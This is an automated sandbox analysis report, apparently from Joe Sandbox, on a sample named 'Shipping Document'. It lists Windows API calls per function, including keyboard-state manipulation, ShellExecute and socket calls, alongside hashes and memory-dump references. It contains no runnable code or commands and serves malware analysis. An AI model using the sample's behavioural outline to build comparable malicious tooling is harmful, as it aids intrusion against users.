                              • Instruction ID: f8e6c773f96f6432fdfdc11c89ad086bc1fefd6adf51ecbc775f02ea05d8c4a2
                              • Opcode Fuzzy Hash: 0a74a5ffc57d2d1c7d438bf631d7f834ff3cedea53f8c04def328bb32dc135b0
                              • Instruction Fuzzy Hash: 3C41B5712042029FDB15EF18CC99F6DB7E5AF80714F08815DF9869F2C2DBB9A804CB55
                              APIs
                              • LoadIconW.USER32(00000000,00007F03), ref: 010232C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2457776203-404129466
                              • Opcode ID: 5751796727ee0d8cf9d4b51d8a6f573ed26bf7dfea98f2dc554ccdd250badb50
                              • Instruction ID: e2d06c561c53e696028a50002ce59ad2cd41c8ca4f0c102297e9b1d397cf8221
                              • Opcode Fuzzy Hash: 5751796727ee0d8cf9d4b51d8a6f573ed26bf7dfea98f2dc554ccdd250badb50
                              • Instruction Fuzzy Hash: 84112B31B083A6BBE7015A59DC47D6EB7DCFF0E670F10005EF580AF182D67D664486A4
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0102454E
                              • LoadStringW.USER32(00000000), ref: 01024555
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0102456B
                              • LoadStringW.USER32(00000000), ref: 01024572
                              • _wprintf.LIBCMT ref: 01024598
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 010245B6
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 01024593
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s
                              • API String ID: 3648134473-3128320259
                              • Opcode ID: 177894805b5efdba201835129e31388b7c0c1d4344db515e465bc3c83029fd69
                              • Instruction ID: 7d7c6515c14c0847aadca8456184883a92551be2265460db750c46286569b514
                              • Opcode Fuzzy Hash: 177894805b5efdba201835129e31388b7c0c1d4344db515e465bc3c83029fd69
                              • Instruction Fuzzy Hash: A201DBF68002197FE720D7A4DEC9EF7776CD708300F000595BB85D2002EA355E854B70
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • GetSystemMetrics.USER32(0000000F), ref: 0104D78A
                              • GetSystemMetrics.USER32(0000000F), ref: 0104D7AA
                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0104D9E5
                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0104DA03
                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0104DA24
                              • ShowWindow.USER32(00000003,00000000), ref: 0104DA43
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0104DA68
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0104DA8B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                              • String ID:
                              • API String ID: 1211466189-0
                              • Opcode ID: 05c8309a071f82fbc7528e8cd1269571fedb6a99f5bfe39163d3d40bec074dae
                              • Instruction ID: 1c4636f6d3579b25d4951044c690f729c5adc882b5f5f8e257d4ac906bd424dc
                              • Opcode Fuzzy Hash: 05c8309a071f82fbc7528e8cd1269571fedb6a99f5bfe39163d3d40bec074dae
                              • Instruction Fuzzy Hash: 28B177B5600216EBEF14CFACC5C57AD7BF2BF54701F0881B9ED889A289D735A950CB90
                              APIs
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FC2ACF
                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000,000000FF), ref: 00FC2B17
                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FFC46A
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FFC4D6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ShowWindow
                              • String ID:
                              • API String ID: 1268545403-0
                              • Opcode ID: 5a2dd4fab95832eeb50be8e319e1b5676194bd7249e2564786217132205fac7a
                              • Instruction ID: ee5f35f63e7ff7394cef47efeb5f9dca98081d61150fbd2039d4f519dd859a14
                              • Opcode Fuzzy Hash: 5a2dd4fab95832eeb50be8e319e1b5676194bd7249e2564786217132205fac7a
                              • Instruction Fuzzy Hash: DB412A71A086869BC7B9DB2C9FDAF7A3B91FF85320F14880DE18786560C67E9841F750
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0102737F
                                • Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
                                • Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010273B6
                              • EnterCriticalSection.KERNEL32(?), ref: 010273D2
                              • _memmove.LIBCMT ref: 01027420
                              • _memmove.LIBCMT ref: 0102743D
                              • LeaveCriticalSection.KERNEL32(?), ref: 0102744C
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 01027461
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 01027480
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                              • String ID:
                              • API String ID: 256516436-0
                              • Opcode ID: f921beb9b0ba86c51f406527fa843801895213b5ac6efd713c77700f18574965
                              • Instruction ID: 17a6824fd9f5b5732af7430cce0b532db692985644449915c2d70d51826788f3
                              • Opcode Fuzzy Hash: f921beb9b0ba86c51f406527fa843801895213b5ac6efd713c77700f18574965
                              • Instruction Fuzzy Hash: 9131CF75900246EBDF10EF69CD85AAFBBB8FF45310B1440A5F944AB24ADB35DA10DBA0
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 0104645A
                              • GetDC.USER32(00000000), ref: 01046462
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0104646D
                              • ReleaseDC.USER32(00000000,00000000), ref: 01046479
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 010464B5
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 010464C6
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01049299,?,?,000000FF,00000000,?,000000FF,?), ref: 01046500
                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01046520
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                              • String ID:
                              • API String ID: 3864802216-0
                              • Opcode ID: 8d62ac627dd1fa7b7ffc25e4532b813661e5ec872c4ec3298c8dc810c3212542
                              • Instruction ID: 372aaa1822fa72986138b2f922b0545e122344ebd0aff47eeb1abaa2aa6853c2
                              • Opcode Fuzzy Hash: 8d62ac627dd1fa7b7ffc25e4532b813661e5ec872c4ec3298c8dc810c3212542
                              • Instruction Fuzzy Hash: EF3193B52011107FEB218F54CD85FE73FA9EF4A751F0400A5FE489A195D67A9841CBA0
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: 32ac2192bb84eca07adb2db7adb0eea1f54c5874a06b98be7b4f41493bfa9e35
                              • Instruction ID: ae5926950b5102db7bbe2158dd79f481bd64d92381729193cb472fc50f2e4577
                              • Opcode Fuzzy Hash: 32ac2192bb84eca07adb2db7adb0eea1f54c5874a06b98be7b4f41493bfa9e35
                              • Instruction Fuzzy Hash: 0821D7727C1209B7F392A5278E42FAF379CAF12294B040024FE899A247E769DD11C1A6
                              APIs
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                                • Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9
                              • _wcstok.LIBCMT ref: 0102EEFF
                              • _wcscpy.LIBCMT ref: 0102EF8E
                              • _memset.LIBCMT ref: 0102EFC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                              • String ID: X
                              • API String ID: 774024439-3081909835
                              • Opcode ID: 3de81efbb5a373a3a7ea8062b58b96d69c6c30c066dd1c2d17a9255e9a1cdcd8
                              • Instruction ID: b065cd47464cb3e81e7cf0eb153cdb373ad26012739e96cbc1d3989aa1291abe
                              • Opcode Fuzzy Hash: 3de81efbb5a373a3a7ea8062b58b96d69c6c30c066dd1c2d17a9255e9a1cdcd8
                              • Instruction Fuzzy Hash: 7EC1AF315083529FD764EF24C986E5AB7E4BF84310F00496DF9D98B2A2DB74ED44DB82
                              APIs
                              • __WSAFDIsSet.WSOCK32(00000000,?), ref: 01036F14
                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01036F35
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036F48
                              • htons.WSOCK32(?), ref: 01036FFE
                              • inet_ntoa.WSOCK32(?), ref: 01036FBB
                                • Part of subcall function 0101AE14: _strlen.LIBCMT ref: 0101AE1E
                                • Part of subcall function 0101AE14: _memmove.LIBCMT ref: 0101AE40
                              • _strlen.LIBCMT ref: 01037058
                              • _memmove.LIBCMT ref: 010370C1
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                              • String ID:
                              • API String ID: 3619996494-0
                              • Opcode ID: 7a41d25e8439ba20d7b96dfbf09a29dd88b907631f42d1bc1f1a4291a94ddf10
                              • Instruction ID: 63e12e0c3018af97015c461e8eb09dd2c0219f9707d05406f41f616d10ea6587
                              • Opcode Fuzzy Hash: 7a41d25e8439ba20d7b96dfbf09a29dd88b907631f42d1bc1f1a4291a94ddf10
                              • Instruction Fuzzy Hash: 0481DF75104302ABD710EB28CD86F6FB7E9AFC4714F00491CF5959B292DA79AE05CBA1
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e96ef96a2fd6f095c114c915078d4fec04398671391c34c170067b1c81a356f9
                              • Instruction ID: 1d4338822af0a1421a8c9146f986375a8c977f2c3b473357a22e4fee73991aaf
                              • Opcode Fuzzy Hash: e96ef96a2fd6f095c114c915078d4fec04398671391c34c170067b1c81a356f9
                              • Instruction Fuzzy Hash: C071807590010AEFCB14CF58CD85FBEBB79FF86324F248149F915AA252C734AA61DB60
                              APIs
                              • IsWindow.USER32(011D5DD8), ref: 0104B6A5
                              • IsWindowEnabled.USER32(011D5DD8), ref: 0104B6B1
                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0104B795
                              • SendMessageW.USER32(011D5DD8,000000B0,?,?), ref: 0104B7CC
                              • IsDlgButtonChecked.USER32(?,?), ref: 0104B809
                              • GetWindowLongW.USER32(011D5DD8,000000EC), ref: 0104B82B
                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0104B843
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                              • String ID:
                              • API String ID: 4072528602-0
                              • Opcode ID: 9de30d596e4d651011b488a885b69921cdc5de79c36d1429a2bf4a6749e859e4
                              • Instruction ID: f2360f9b56d9a7d0c728e712d141e39bdfab7c9a59dc80f05dbe7df087ea3fa6
                              • Opcode Fuzzy Hash: 9de30d596e4d651011b488a885b69921cdc5de79c36d1429a2bf4a6749e859e4
                              • Instruction Fuzzy Hash: 7C719EB4604205AFEB65EF68C8D4FAA7BF9FF09340F0840A9EAC597251C736E941CB50
                              APIs
                              • _memset.LIBCMT ref: 0103F75C
                              • _memset.LIBCMT ref: 0103F825
                              • ShellExecuteExW.SHELL32(?), ref: 0103F86A
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                                • Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9
                              • GetProcessId.KERNEL32(00000000), ref: 0103F8E1
                              • CloseHandle.KERNEL32(00000000), ref: 0103F910
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                              • String ID: @
                              • API String ID: 3522835683-2766056989
                              • Opcode ID: 0fbfa011cccefa9d588fcfe196bb145be3e97b075fe77a579c27b2decf8287ae
                              • Instruction ID: c419759055dc6bf615656a4da87e47797c8eb0cd25d8dc6a31fe244dfe675aeb
                              • Opcode Fuzzy Hash: 0fbfa011cccefa9d588fcfe196bb145be3e97b075fe77a579c27b2decf8287ae
                              • Instruction Fuzzy Hash: C461C075E0061ADFCB14EF54C985AAEBBF4FF88310B14805DE88AAB351CB34AD40CB90
                              APIs
                              • GetParent.USER32(?), ref: 0102149C
                              • GetKeyboardState.USER32(?), ref: 010214B1
                              • SetKeyboardState.USER32(?), ref: 01021512
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 01021540
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0102155F
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 010215A5
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010215C8
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 7d2ec55a8b7697a9e60233923e1377b11c892661d827287dda885068ebcd5532
                              • Instruction ID: 98e9f08d12e6e0fb1a687d0404f8a981c7188d50ac4b06f1f30cd9aa5d6c3e64
                              • Opcode Fuzzy Hash: 7d2ec55a8b7697a9e60233923e1377b11c892661d827287dda885068ebcd5532
                              • Instruction Fuzzy Hash: 9151C2B0A047F67EFB3646388C45BBA7EE96F06304F0C45C9E2D9558C2D7B99884D750
                              APIs
                              • GetParent.USER32(00000000), ref: 010212B5
                              • GetKeyboardState.USER32(?), ref: 010212CA
                              • SetKeyboardState.USER32(?), ref: 0102132B
                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01021357
                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01021374
                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010213B8
                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010213D9
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 3bf59876728719ccaa536d7c0b469f2c8ccd472afe11852a3f69d431d8a29a70
                              • Instruction ID: aee6b1df716302bb2af0cce2df254e05e2ff76b88c78311742cdc6a481be859d
                              • Opcode Fuzzy Hash: 3bf59876728719ccaa536d7c0b469f2c8ccd472afe11852a3f69d431d8a29a70
                              • Instruction Fuzzy Hash: 1151D8B05047E63DFB3286288C55BBA7FEA6F06304F0885C9E2D8568C2D7B5A898D750
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcsncpy$LocalTime
                              • String ID:
                              • API String ID: 2945705084-0
                              • Opcode ID: 95b959342bbfde12c382186f302d1910bfcc6e89dfb39920e5dc930bfba85bc5
                              • Instruction ID: 7905e644cd0193bb75c4ceebf2fb65eb373e573021e3b74e1990ecb37fbde907
                              • Opcode Fuzzy Hash: 95b959342bbfde12c382186f302d1910bfcc6e89dfb39920e5dc930bfba85bc5
                              • Instruction Fuzzy Hash: F741A5A5C2026876CB51EBB58C8B9CFB7ACAF05310F508466F658E3111F738E714D7AA
                              APIs
                                • Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010238D3,?), ref: 010248C7
                                • Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010238D3,?), ref: 010248E0
                              • lstrcmpiW.KERNEL32(?,?), ref: 010238F3
                              • _wcscmp.LIBCMT ref: 0102390F
                              • MoveFileW.KERNEL32(?,?), ref: 01023927
                              • _wcscat.LIBCMT ref: 0102396F
                              • SHFileOperationW.SHELL32(?), ref: 010239DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                              • String ID: \*.*
                              • API String ID: 1377345388-1173974218
                              • Opcode ID: 7623de0b47f164bd1bd217732442ea1dac5ca6865c3ca65cf29c398f1be03b41
                              • Instruction ID: 0e90084cbf2e12a211a93a3a99862f695b6319c361996b701469c9635b2cff97
                              • Opcode Fuzzy Hash: 7623de0b47f164bd1bd217732442ea1dac5ca6865c3ca65cf29c398f1be03b41
                              • Instruction Fuzzy Hash: 754181B16083959AC791EF68C881ADFB7ECBF89340F00096EF5C9C7151EA39D248C752
                              APIs
                              • _memset.LIBCMT ref: 01047519
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010475C0
                              • IsMenu.USER32(?), ref: 010475D8
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01047620
                              • DrawMenuBar.USER32 ref: 01047633
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
